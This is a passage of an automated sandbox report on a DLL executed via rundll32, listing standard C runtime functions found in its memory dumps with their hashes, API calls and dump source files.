                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Replicator::operator[]
                                                                                                                                                                                                                            • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                                            • API String ID: 3676697650-3207858774
                                                                                                                                                                                                                            • Opcode ID: 5a260dd3a37411976ea98f4b6fb2ab20663cecc062b10b3ff23bd445ef19509f
                                                                                                                                                                                                                            • Instruction ID: 42aa4a1d08367d9119b1856bc683fc241d67aaeadb9c155bb09d8b169f315b88
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a260dd3a37411976ea98f4b6fb2ab20663cecc062b10b3ff23bd445ef19509f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2817A32616A8C89FBA2CFA5E4903E837A1A75DBC8F94C116FA4907795DF39C749C340
                                                                                                                                                                                                                            Function 0000000180015478 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                                                                                                                                            • API String ID: 2943138195-1464470183
                                                                                                                                                                                                                            • Opcode ID: 088971c54ca3ffb1adebbb16f067770a9e4fe21448ff300c31355ef277b9d300
                                                                                                                                                                                                                            • Instruction ID: 86b2220616b80be68583d285cd14afb8824f7222dcd2462d23f21e207e41fe12
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 088971c54ca3ffb1adebbb16f067770a9e4fe21448ff300c31355ef277b9d300
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90514F32610F58C9FB92CB64E8907EC37B2B7183C9FA08015EA895BA98DF35C659C740
                                                                                                                                                                                                                            Function 000000018003D970 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 489COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: -$0$f$p$p
                                                                                                                                                                                                                            • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                            • Opcode ID: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                            • Instruction ID: 634aa9d0042bbda353e8cc45d4c8daf7f92220045ba3d69c75e7207222ffe171
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a16dd49484b322b6fd78fdbbed546c3ccc268b2020a70802ac313a8fc196001
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C412B032A0418D86FBA76E15F0443EB77A1F788B94F96C116F68647AC4DF78C688CB00
                                                                                                                                                                                                                            Function 000000018003E3D4 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 478COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: -$0$f$p$p
                                                                                                                                                                                                                            • API String ID: 3215553584-1865143739
                                                                                                                                                                                                                            • Opcode ID: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                            • Instruction ID: 93a9ff39d45d2419c6a7fc755833649a49288bc20d1d0bfe1c27cd3576f2de20
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff8427b3a9059b88c8ce9f386e4ea062f82f7a66593184870899fb3a07859c96
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E612E331A042DA86FBA39B14D0543EB7791F35ABD4F9AC312F696476C4DF38C6888B10
                                                                                                                                                                                                                            Function 0000000180017220 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                                            • API String ID: 2943138195-2239912363
                                                                                                                                                                                                                            • Opcode ID: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                            • Instruction ID: 11c260e0c16152af3f3440f9639a3bccbf9e6650033c1e5fc3f0bfcfe7c7928e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfb6c385fe5b2ebc5ee7c871daae868a3679fdeefb2062b3cbc30b8eca46961b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30513872B14F5898FB928B60D8803ED77B0B70C788F548125EE5923B96DF788389C710
                                                                                                                                                                                                                            Function 000000018002068C Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 475COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: -$f$p$p
                                                                                                                                                                                                                            • API String ID: 3215553584-2516539321
                                                                                                                                                                                                                            • Opcode ID: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                            • Instruction ID: 3b4b050498cdcb5f336cd356739b46ea81abb083d02af334d156d32d0928b2a6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19540540e18a12fbd70b594dd22ebd52cf533dd5dd11ba696ac90525da22a166
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B12A27160438A86FBA39B14E0447EA7762F3587D4FF4C115F6D246AC6DF39CA888B05
                                                                                                                                                                                                                            Function 000000018000C928 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                            • Opcode ID: 8152444fde3df33d3fc19ab23fa89504be66b01d467fa357cf36183d89cc0f39
                                                                                                                                                                                                                            • Instruction ID: d2b285feaf2a7c9902849b73c345f52bfdc77f3075a64cd68fdca09590970db2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8152444fde3df33d3fc19ab23fa89504be66b01d467fa357cf36183d89cc0f39
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23D18D32604B488AEBA2DB25D4807DD3BA0F7497C8F008216FF8957B96CF34D689C701
                                                                                                                                                                                                                            Function 000000018004816C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482EB
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00000001800485F8,?,?,00000000,00000001800473F0,?,?,?,000000018003FF1D), ref: 00000001800482F7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                            • Opcode ID: 0d299566b81bc57299c7a1d78208d6e8857f952c1b81df691ed9895207af2ff4
                                                                                                                                                                                                                            • Instruction ID: 950cb933599524e4be349329b0f14d28e915af748e4a11c5b25ef056b0586ea4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d299566b81bc57299c7a1d78208d6e8857f952c1b81df691ed9895207af2ff4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C941F231311E0881FAA7CB16AD403DA2396BB4DBE4F49C925BE1A97784EE3CC64D9344
                                                                                                                                                                                                                            Function 0000000180048428 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 77libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 2559590344-537541572
                                                                                                                                                                                                                            • Opcode ID: 5f731d081a05f6a95782ac3a15dc747bbdcc723eeb0ed29383746bad62b9c2d4
                                                                                                                                                                                                                            • Instruction ID: 0e08bba11ac0ad9f6f6124514d17085406b5fd0418ae2fa010a6a0cc5cd50d11
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f731d081a05f6a95782ac3a15dc747bbdcc723eeb0ed29383746bad62b9c2d4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31A031711E0581EBA39B16984039D63A4BB4CBE4F5D8A25BF2A437D5EF38CA498308
                                                                                                                                                                                                                            Function 0000000180007470 Relevance: 12.2, APIs: 8, Instructions: 234threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1666949209-0
                                                                                                                                                                                                                            • Opcode ID: 03aea4405d3ee7ac1ce51f989aca9336de7ed29b735687dc17f6ff6147a09d28
                                                                                                                                                                                                                            • Instruction ID: de2e915fae306b5b51e8ed7498582b349e8bb643afe958a96c2b02e58ec33d63
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03aea4405d3ee7ac1ce51f989aca9336de7ed29b735687dc17f6ff6147a09d28
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13D17976609B8882DAB1DB0AE49439A77A0F39CBC5F108216FACD477A5CF7DC655CB00
                                                                                                                                                                                                                            Function 0000000180019740 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: {for
                                                                                                                                                                                                                            • API String ID: 2943138195-864106941
                                                                                                                                                                                                                            • Opcode ID: 0c0d30ad377e4ea5a3451009b1db462a15400a07ebc6bc3e0ddb6c2557d9ff17
                                                                                                                                                                                                                            • Instruction ID: 495a72a0baf00997086ff0ea6129483d1001404d3758be8f7ad89a7954a2554b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c0d30ad377e4ea5a3451009b1db462a15400a07ebc6bc3e0ddb6c2557d9ff17
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9513A72605B88A9FB92DF68D4803EC77A1E349788F84D015FA485BB99DF78C799C340
                                                                                                                                                                                                                            Function 0000000180015AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::
                                                                                                                                                                                                                            • String ID: %lf
                                                                                                                                                                                                                            • API String ID: 1333004437-2891890143
                                                                                                                                                                                                                            • Opcode ID: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                            • Instruction ID: 034e1c8f7962a666fb3fc1dfd84da393ef72e1dbc0cb733e50f71f00acf91dbc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B331C372604F8C85EBA2DF25A8503EA6351B74EBC5F54C216FA9A4B791DF2CC3498340
                                                                                                                                                                                                                            Function 000000018000F96C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9F1
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9FF
                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA29
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA97
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FAA3
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                            • Opcode ID: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                            • Instruction ID: e8c6680ccd9c6dd87d65be781d57c711bd3b5d14812437631edbc0f748074d2d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF318071312B4891EEA7DB12A8007E63394BB4DBE0F598635BD1D4BB95EF3CC6499301
                                                                                                                                                                                                                            Function 00000001800136C8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
